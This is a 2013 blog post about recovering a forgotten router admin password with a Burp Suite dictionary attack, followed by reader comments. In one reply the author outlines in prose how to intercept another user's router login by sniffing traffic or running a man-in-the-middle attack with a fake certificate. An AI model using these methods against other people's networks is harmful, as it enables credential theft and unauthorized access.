Recovering router password using Burp Suite dictionary attack

August 26th, 2013  Posted at   Backtrack, Blackbuntu, Kali, Linux, Windows

Few weeks ago, during cleaning up, I found an old access point/router. I wanted to attach it to my network and do some tests, but I did not remember the password for configuring it through its web access page. I knew it had to be some default user/password but I did not succeed in my tries. I thought it was the right time to prepare a small dictionary attack. There are many powerful tools for this task but I used “Burp Suite” because I love it and I try to use it whenever I can. Furthermore is a perfect tool for understanding what happen behind the scenes during these kind of attacks.

I made the following video trying to explain this process. I hope you find it helpful.

If you want you can download the ‘combinator’ script used in the video -> combinator.rb.

Enjoy.

 

7 Responses to “Recovering router password using Burp Suite dictionary attack”

  1. Kirill says:

    combinator.rb perezaleyte or give another link.
    Thank you

  2. Ryan says:

    Is there a way to recover a router password that isn’t on a router using HTTP basic authentication (popup on router page).

    • Samuel says:

      Hello Ryan,

      You have to study first the way that credentials are provided to the router and then configure the attack in a proper way. In the final part of the video (min 06:43) I show how to use this technique for a router that does not get credentials using HTTP basic authentication.

  3. Samuel says:

    Hi Modar,

    You are right. The key here is that the communication between the user and the router is not encrypted. We are not using HTTPS for accessing the router’s homepage. This means that if you can sniff the http post request that contains the login info, you can get the password. The challenge here is how to get this request.

    For example if your are inside a not switched network, all the traffic is sent to all the stations and you only have to put your network interface in promiscuous mode to get it.
    If the user that logs into the router is using a wireless connection, you can “sniff the air” and get the traffic you need.
    Finally if you are inside a wired switched network you will have to apply a MITM (Man In The Middle) technique to get the traffic. You can use this technique even if the connection was encrypted by using a fake certificate.

    Once you can sniff the traffic (with your card in promiscuous mode) you can use a tool like Wireshark to view the individual packets, find the http post request and get the password.

    But nothing of this would have worked for me because nobody knew the password. So my options were dictionary attack or find some vulnerability to exploit for that router model.

    Thank you for your comment.

  4. Modar says:

    Great video! I was really looking for this.

    Quick question, though, what if I’m not using a common combination for my router homepage. What if I’m using numbers and symbols. Is there any way to capture the username/password combination when another user logs into the router’s homepage? Since the encoding is pretty basic, or sometimes even in plain text. In another way, if I’m connected to the network through the wireless password, but I have no access to the router’s homepage, can I sniff the combination when another user enters them, or is the dictionary attack the only way possible?

    Thanks.

Leave a Reply

Time limit is exhausted. Please reload CAPTCHA.